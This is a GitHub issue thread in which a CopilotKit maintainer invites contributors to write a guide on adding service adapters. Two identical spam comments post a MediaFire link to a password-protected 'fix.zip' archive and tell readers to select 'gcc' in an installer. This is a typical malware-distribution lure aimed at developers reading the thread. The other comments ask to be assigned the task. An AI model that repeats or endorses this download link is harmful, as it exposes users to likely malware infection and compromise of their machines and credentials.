### ISSUE TITLE
📚 Documentation: Contribution Guide - Adding an Adapter

### ISSUE THREAD

**Issue by arielweinberger** [CopilotKit/CopilotKit#545]
### 💬 Let us know how we can improve our documentation.

We would like to have a contribution guide in our docs for adding an adapter to CopilotKit.

Before we pick this up ourselves, we would like to welcome community members to contribute.

Additional information:

- You can find our existing adapters for reference [here](https://github.com/CopilotKit/CopilotKit/tree/main/CopilotKit/packages/runtime/src/service-adapters)
- You can learn more about Adapters [here](https://docs.copilotkit.ai/concepts/self-hosting#service-adapters)
- You can learn how to make contributions to our documentation [here](https://docs.copilotkit.ai/documentation-contributions)

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hpatel-blackbug** [comment]
can you assign?

**Comment by Aienthu1** [comment]
@arielweinberger  can you assign  me this work ?
